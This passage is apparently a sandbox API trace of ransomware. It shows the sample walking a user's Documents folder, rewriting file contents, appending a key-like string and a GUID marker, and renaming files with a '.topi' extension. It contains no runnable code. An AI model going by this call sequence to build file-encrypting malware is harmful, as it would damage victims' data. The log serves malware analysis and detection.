"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\gccti_fu.pptx.topi")) returned 1 [0096.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.122] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.124] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a308260, ftCreationTime.dwHighDateTime=0x1d5c1f7, ftLastAccessTime.dwLowDateTime=0xeb0c5f80, ftLastAccessTime.dwHighDateTime=0x1d5bd8e, ftLastWriteTime.dwLowDateTime=0xeb0c5f80, ftLastWriteTime.dwHighDateTime=0x1d5bd8e, nFileSizeHigh=0x0, nFileSizeLow=0xe126, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kMFzCyZM_VYYm.docx", cAlternateFileName="KMFZCY~1.DOC")) returned 1 [0096.124] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\kMFzCyZM_VYYm.docx") returned=".docx" [0096.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\kMFzCyZM_VYYm.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\kmfzcyzm_vyym.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.124] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=57638) returned 1 [0096.124] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.127] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.127] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.129] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.130] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.130] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.130] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.130] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.130] GetLastError () returned 0x0 [0096.130] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.130] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.130] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.130] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.130] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe130) returned 0x9a06a00 [0096.131] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.131] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02510 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02558 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.132] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9840 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9828 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.133] GetCurrentThreadId () returned 0x8c4 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7770 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.134] GetCurrentThreadId () returned 0x8c4 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9858 [0096.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02558 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.138] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xe121, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xe121, lpOverlapped=0x0) returned 1 [0096.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.138] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe126, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.138] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.138] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.139] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.139] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.139] CloseHandle (hObject=0x6a8) returned 1 [0096.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0096.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0096.140] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\kMFzCyZM_VYYm.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\kmfzcyzm_vyym.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\kMFzCyZM_VYYm.docx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\kmfzcyzm_vyym.docx.topi")) returned 1 [0096.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.141] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.142] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834b3c60, ftCreationTime.dwHighDateTime=0x1d5bebd, ftLastAccessTime.dwLowDateTime=0x3db21a30, ftLastAccessTime.dwHighDateTime=0x1d5c59c, ftLastWriteTime.dwLowDateTime=0x3db21a30, ftLastWriteTime.dwHighDateTime=0x1d5c59c, nFileSizeHigh=0x0, nFileSizeLow=0xd8d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qe7r.xls", cAlternateFileName="")) returned 1 [0096.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x31532f8 [0096.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.142] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\qe7r.xls") returned=".xls" [0096.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\qe7r.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\qe7r.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.143] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=55508) returned 1 [0096.143] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.146] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd8ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.146] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, 